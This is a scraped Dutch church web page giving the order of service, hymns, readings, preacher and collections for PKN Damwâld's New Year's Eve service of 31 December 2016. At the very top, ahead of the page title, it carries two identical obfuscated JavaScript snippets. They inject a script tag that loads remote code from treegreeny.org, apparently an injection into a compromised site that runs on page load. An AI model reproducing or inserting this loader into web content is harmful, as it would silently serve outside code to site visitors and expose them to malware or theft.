;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Oudejaardienst - PKN Damwâld
zaterdag 31 december 2016
19:30 uur

Oudejaardienst

vg_-01

Informatie

Voorganger:G. Timmer
Organist:Ivo van Hijum
Liturgie
lied voor de dienst Psalm 90: 1 en 2
Welkom en mededelingen
Intochtslied Psalm 90: 3 en 8
Stil gebed, bemoediging en groet .
We zingen: ELB 348: 1 en 5
Gebed .
We lezen: Lukas 9: 51-62
We zingen: Gezang 47: 1, 2 en 3
Verkondiging “Hoe ver zijn we gekomen?”
We zingen: Psalm 73: 9 en 10
Geloofsbelijdenis .
We zingen: ELB 37: 1 en 4
Dankgebed en voorbeden .
Collecte
Slotlied Gezang 396: 1, 2, 3, 4, 5 en 6
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Stichting Voorkom

De Stichting Voorkom verzorgt preventieve voorlichting over alcohol, drugs, gokken, roken en internet vanuit een christelijke levensvisie. Ook verleent de stichting hulp bij de oprichting van plaatselijke en regionale steunpunten.

Tweede collecte: Oudejaarscollecte
Uitganscollecte: Kerk